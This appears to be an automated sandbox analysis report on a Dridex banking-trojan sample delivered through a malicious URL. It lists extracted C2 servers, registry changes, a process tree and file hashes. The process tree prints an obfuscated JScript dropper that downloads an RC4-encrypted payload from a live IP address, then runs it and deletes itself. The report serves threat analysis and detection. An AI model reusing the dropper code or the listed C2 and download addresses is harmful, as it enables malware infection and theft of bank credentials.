dridex | hxxps://hilltop2exit[.]xyz/kjlfkvd82d

General

Target

https://hilltop2exit.xyz/kjlfkvd82d
Sample

211020-b6eqbagea9

Score

10^/10

dridex 10111 botnet discovery evasion persistence trojan

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

37.48.124.102:9676

84.33.2.126:6225

188.40.33.77:8194

rc4.plain

Signatures

Dridex
Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.
botnet dridex
Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Blocklisted process makes network request 1 IoCs

Processes:

wscript.exe

flow pid process

23 1592 wscript.exe
Executes dropped EXE 1 IoCs

Processes:

09cz9.exe

pid process

4332 09cz9.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

09cz9.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 09cz9.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
23	1592	wscript.exe

pid	process
4332	09cz9.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	09cz9.exe

Modifies Internet Explorer settings 1 TTPs 40 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2000312143"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30917466"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz!	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "341290663"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1977812291"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "341242077"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1977812291"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "341258672"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30917466"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\de-DE = "de-DE.1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9F68346D-2F4D-11EC-B8A3-5A459D8504CF} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30917466"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe

Modifies registry class 44 IoCs

Processes:

FileSyncConfig.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INSTANCE\INITPROPERTYBAG	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DEFAULTICON	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SortOrderIndex = "66"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ = "OneDrive"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\Attributes = "17"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\CLSID = "{0E5AAE11-A475-4c5b-AB00-C66DE400274E}"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\FolderValueFlags = "40"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SHELLFOLDER	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32\ = "%systemroot%\\SysWow64\\shell32.dll"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\Attributes = "4034920525"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\System.IsPinnedToNameSpaceTree = "1"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\TargetKnownFolder = "{a52bba46-e9e1-435f-b3d9-28daa648c0f6}"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ = "OneDrive"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\FolderValueFlags = "40"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\SortOrderIndex = "66"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe,0"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INPROCSERVER32	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INSTANCE\INITPROPERTYBAG	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\CLSID = "{0E5AAE11-A475-4c5b-AB00-C66DE400274E}"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\Attributes = "4034920525"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DEFAULTICON	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\System.IsPinnedToNameSpaceTree = "1"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\TargetKnownFolder = "{a52bba46-e9e1-435f-b3d9-28daa648c0f6}"	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32\ = "%systemroot%\\system32\\shell32.dll"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe,0"	FileSyncConfig.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\Attributes = "17"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INPROCSERVER32	FileSyncConfig.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

iexplore.exe

pid process

4184 iexplore.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

4184 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

4184 iexplore.exe
4184 iexplore.exe
3060 IEXPLORE.EXE
3060 IEXPLORE.EXE
3060 IEXPLORE.EXE
3060 IEXPLORE.EXE

pid	process
4184	iexplore.exe

pid	process
4184	iexplore.exe

pid	process
4184	iexplore.exe
4184	iexplore.exe
3060	IEXPLORE.EXE
3060	IEXPLORE.EXE
3060	IEXPLORE.EXE
3060	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

iexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exe

description	pid	process	target process
PID 4184 wrote to memory of 3060	4184	iexplore.exe	IEXPLORE.EXE
PID 4184 wrote to memory of 3060	4184	iexplore.exe	IEXPLORE.EXE
PID 4184 wrote to memory of 3060	4184	iexplore.exe	IEXPLORE.EXE
PID 3060 wrote to memory of 1768	3060	IEXPLORE.EXE	cmd.exe
PID 3060 wrote to memory of 1768	3060	IEXPLORE.EXE	cmd.exe
PID 3060 wrote to memory of 1768	3060	IEXPLORE.EXE	cmd.exe
PID 1768 wrote to memory of 1592	1768	cmd.exe	wscript.exe
PID 1768 wrote to memory of 1592	1768	cmd.exe	wscript.exe
PID 1768 wrote to memory of 1592	1768	cmd.exe	wscript.exe
PID 1592 wrote to memory of 3996	1592	wscript.exe	cmd.exe
PID 1592 wrote to memory of 3996	1592	wscript.exe	cmd.exe
PID 1592 wrote to memory of 3996	1592	wscript.exe	cmd.exe
PID 3996 wrote to memory of 4332	3996	cmd.exe	09cz9.exe
PID 3996 wrote to memory of 4332	3996	cmd.exe	09cz9.exe
PID 3996 wrote to memory of 4332	3996	cmd.exe	09cz9.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://hilltop2exit.xyz/kjlfkvd82d
1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4184

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4184 CREDAT:82945 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3060

C:\Windows\SysWOW64\cmd.exe
cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.40/?MjQzNTky&JGJhtxT&fhfghddfsdf=arena&ogfgafgn4=wnzQMvXcLxXQFYPBJf7cT&dsfdffg43t=6RDKUfYHliJz5Gb3fqSCZ39JHT109zUSkrw6B2aCl7h_fEoLLRSOVDjikTRewdlndhZUAsSoaishhCGyBef0sbW_xaIYlhE-qKQErALhR32zYE&cxssdvxcv=128dftp.97gi66.406r8r2p7&sdfsdfdfg=shuffle&kplMTcxMTU=" "2"
3⤵
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\SysWOW64\wscript.exe
wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.40/?MjQzNTky&JGJhtxT&fhfghddfsdf=arena&ogfgafgn4=wnzQMvXcLxXQFYPBJf7cT&dsfdffg43t=6RDKUfYHliJz5Gb3fqSCZ39JHT109zUSkrw6B2aCl7h_fEoLLRSOVDjikTRewdlndhZUAsSoaishhCGyBef0sbW_xaIYlhE-qKQErALhR32zYE&cxssdvxcv=128dftp.97gi66.406r8r2p7&sdfsdfdfg=shuffle&kplMTcxMTU=" "2"
4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1592

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c 09cz9.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:3996

C:\Users\Admin\AppData\Local\Temp\09cz9.exe
09cz9.exe
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4332

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe"
1⤵
- Modifies registry class
PID:4940

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
MD5
bcc1cc8e9989b87087d23e119f44f534

SHA1
5f1f9622769b1a11ea6a5a67af094b82d6052fd1

SHA256
b4bb217e52ab6f7ddab1ccafda702ac33f338dfc65eaaa955afdb1979f19ca46

SHA512
73e3befee1440cf382a23ab83f331f17ada79a72815c5f844336830857c385ead9883eb94bbe0cae9d910618d32964f61bb30650c7e367cea2e8e9bcf4f66552

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
MD5
55cbc132816495c1d210f2d2131cd2e7

SHA1
7f751bcb8549d6bbf6c4fc841fe98b8d090296db

SHA256
0ccb492ac30681b8d82cc915a3aeadbf290b74a1ae4d45bfd3c4ad4f32f23e5e

SHA512
82f5d4191e78c1bdb19b003381cb1293d3a5d88b186205ad81ffac59b1fc9376e03ee9f5aeddc220230d4f9a1ffda9b1705e7b95993ff8df9dfc6a9612a79c0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\IY4UI5I1.cookie
MD5
1f33d43b8bd928efca12f0d1e81c658f

SHA1
9d8d422abdc667ce1ec9b0ee182fa680cab5a157

SHA256
db200409dd429f2d4ae99edb04fac0310cfeda879a1856d7d681d87f52631543

SHA512
e2f416025a02840551b20d612733ecf898554fbce50fec711a08d20a3bf03ce7f995ca8c5c5db4c78e9371286d8766446e0e954702456513d0e0cc1e121f1032

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\SHGAC1OS.cookie
MD5
edf96eb6c8c5375ceada96a9adfc0780

SHA1
340173200c57bd3d0a10c73e97425ef8448a6753

SHA256
71416d91a0258cde3cbef83efd7d80d7510b8325722093d10565f94df15803cd

SHA512
27cecef3be9c5fb4a16af824ef84c4ae9d646d6ecd880885970bf5ddc54a3d64527d633064478d265a2e3230f723362778cc221d4a827a3793074378492331ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\09cz9.exe
MD5
99c777be6fb871151545cfcc59c3f89f

SHA1
d2855b68c2aa24d4721bc0a30c0e7b2a747acefd

SHA256
e3dc9d3ef3a79da287ae7357a2d64c47bb01a27946c62c80225636c1bfa03629

SHA512
441792a45ffdd663a3e0b81bc797bab39c9de3ea7bc88814c2722fc4d915dc67ed8ec2eb9688cbcb2ae0550fccfaaa1f481ddf24f47d0050663c5c1fba4c5ef3

Download Submit
C:\Users\Admin\AppData\Local\Temp\09cz9.exe
MD5
99c777be6fb871151545cfcc59c3f89f

SHA1
d2855b68c2aa24d4721bc0a30c0e7b2a747acefd

SHA256
e3dc9d3ef3a79da287ae7357a2d64c47bb01a27946c62c80225636c1bfa03629

SHA512
441792a45ffdd663a3e0b81bc797bab39c9de3ea7bc88814c2722fc4d915dc67ed8ec2eb9688cbcb2ae0550fccfaaa1f481ddf24f47d0050663c5c1fba4c5ef3

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.tMp
MD5
60fc00422b399db85f87d41b8328976d

SHA1
bb85034acad8025f97e5bb236443debaf8926e4b

SHA256
c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

SHA512
16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

Download Submit
memory/1592-169-0x0000000000000000-mapping.dmp

Download
memory/1768-168-0x0000000000000000-mapping.dmp

Download
memory/3060-140-0x0000000000000000-mapping.dmp

Download
memory/3996-171-0x0000000000000000-mapping.dmp

Download
memory/4184-132-0x00007FF8D3860000-0x00007FF8D38CB000-memory.dmp

Filesize
428KB

Download
memory/4184-165-0x00007FF8D3860000-0x00007FF8D38CB000-memory.dmp

Filesize
428KB

Download
memory/4184-131-0x00007FF8D3860000-0x00007FF8D38CB000-memory.dmp

Filesize
428KB

Download
memory/4184-115-0x00007FF8D3860000-0x00007FF8D38CB000-memory.dmp

Filesize
428KB

Download
memory/4184-133-0x00007FF8D3860000-0x00007FF8D38CB000-memory.dmp

Filesize
428KB

Download
memory/4184-135-0x00007FF8D3860000-0x00007FF8D38CB000-memory.dmp

Filesize
428KB

Download
memory/4184-136-0x00007FF8D3860000-0x00007FF8D38CB000-memory.dmp

Filesize
428KB

Download
memory/4184-137-0x00007FF8D3860000-0x00007FF8D38CB000-memory.dmp

Filesize
428KB

Download
memory/4184-138-0x00007FF8D3860000-0x00007FF8D38CB000-memory.dmp

Filesize
428KB

Download
memory/4184-128-0x00007FF8D3860000-0x00007FF8D38CB000-memory.dmp

Filesize
428KB

Download
